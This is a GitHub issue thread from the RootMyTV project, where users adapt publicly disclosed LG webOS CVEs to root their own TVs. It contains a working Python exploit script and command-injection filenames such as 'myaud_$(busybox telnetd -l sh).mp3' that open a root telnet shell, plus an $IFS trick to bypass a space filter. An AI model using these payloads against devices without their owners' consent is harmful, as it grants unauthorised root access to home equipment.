RootMyTV.github.io
RootMyTV.github.io copied to clipboard
RootMyTV
Recent exploits
I wonder if it's enough for a RootMyTV v3...
https://www.cve.org/CVERecord?id=CVE-2023-6317 https://www.cve.org/CVERecord?id=CVE-2023-6318 https://www.cve.org/CVERecord?id=CVE-2023-6319 https://www.cve.org/CVERecord?id=CVE-2023-6320
Source: https://www.bitdefender.com/blog/labs/vulnerabilities-identified-in-lg-webos/
Thanks, this does actually sound extremely usable. Iff we're going to do a v3 release, we should probably prioritize using these bugs since they're already known to LG. (we were also aware of some of these bugs already ;) )
Btw do you have a source for the in-the-wild exploitation? It doesn't exactly matter for our purposes but I'd be interested to know more.
Btw do you have a source for the in-the-wild exploitation? It doesn't exactly matter for our purposes but I'd be interested to know more.
I have misinterpreted the news. My apologies! What I meant to say was that the exploits were discovered by Bitdefender researchers, which could potentially attract the attention of malicious actors. As a security researcher, I'll keep an eye out! 👀
Cheers and my apologies again!
Can confirm that CVE-2023-6319 (getAudioMetadata) works on my LG OLED C1 with webOS 6.0 (03.36.50), managed to successfully get root and install the homebrew app, I've also tried CVE-2023-6318 (processAnalyticsReport) but it didn't seem to work.
In case it helps, all I did was scp an MP3 and an LRC file as described in the article to /media/developer/temp/ using the LG developer mode SSH server with names like myaud_$(busybox telnetd -l sh).mp3, then ran this Python script:
import asyncio
from aiopylgtv import WebOsClient
HOST = "TV_IP_ADDR"
async def main():
client = await WebOsClient.create(HOST)
await client.connect()
await client.luna_request("com.webos.service.attachedstoragemanager/getAudioMetadata", {
"deviceId": "0bcef",
"fullPath": "/media/developer/temp/myaud_$(busybox telnetd -l sh).mp3"
})
await client.disconnect()
if __name__ == "__main__":
asyncio.run(main())
I've also tried to make an all-in-one script using com.webos.service.downloadmanager/download to push the files to the filesystem, but it blocks URLs with spaces in the name, so if anyone has a workaround then please let me know.
@illixion I haven't tried against my TV at all but I think you'll find you can bypass the need for spaces entirely by replacing them with $IFS, i.e.
"/media/developer/temp/myaud_$(busybox$IFStelnetd$IFS-l$IFSsh).mp3"
(again, untested!)
@DavidBuchanan314 that's genius, thank you for suggesting this, after some trial and error I've landed on /mnt/lg/appstore/internal/downloads/myaud_$(telnetd$IFS-lsh).mp3 which does work! I'll post a guide along with an updated script on my blog for those who are interested.
Edit: now published: https://blog.illixion.com/2024/04/root-lg-webos-tv/
@DavidBuchanan314 that's genius, thank you for suggesting this, after some trial and error I've landed on
/mnt/lg/appstore/internal/downloads/myaud_$(telnetd$IFS-lsh).mp3which does work! I'll post a guide along with an updated script on my blog for those who are interested.
Looking forward to that post. Great work.
Edit: now published: https://blog.illixion.com/2024/04/root-lg-webos-tv/
@illixion can confirm you script working on my TVs: webOS 7.3.1-39 03.33.65 (OLED42C21LA) webOS 7.3.1-43 03.33.85 (75NANO756QA)
Moved to https://github.com/illixion/root-my-webos-tv/issues/1#issuecomment-2060980484.
tl;dr - webOS version 05.40.20 doesn't work for me.
@illixion does not seem to work on 😞 webOS 7.3.1-42 03.33.80 (43UQ80009LB)
Is it possible to update to a specific version? I.e. 7.3.1-43? Would not want to let my TV do it on its own...
Please create issues related to my script in its repo instead of here, so we can have everything documented and categorized in one place: https://github.com/illixion/root-my-webos-tv
For all of that is a bit to heavy. Just to be clear. There is "still" no way (not counting the hardware method, since I do not understand there anything at all) to root an TV with 6.10.30 firmware, right?
For all of that is a bit to heavy. Just to be clear. There is "still" no way (not counting the hardware method, since I do not understand there anything at all) to root an TV with 6.10.30 firmware, right?
Recently discovered https://github.com/throwaway96/dejavuln-autoroot should work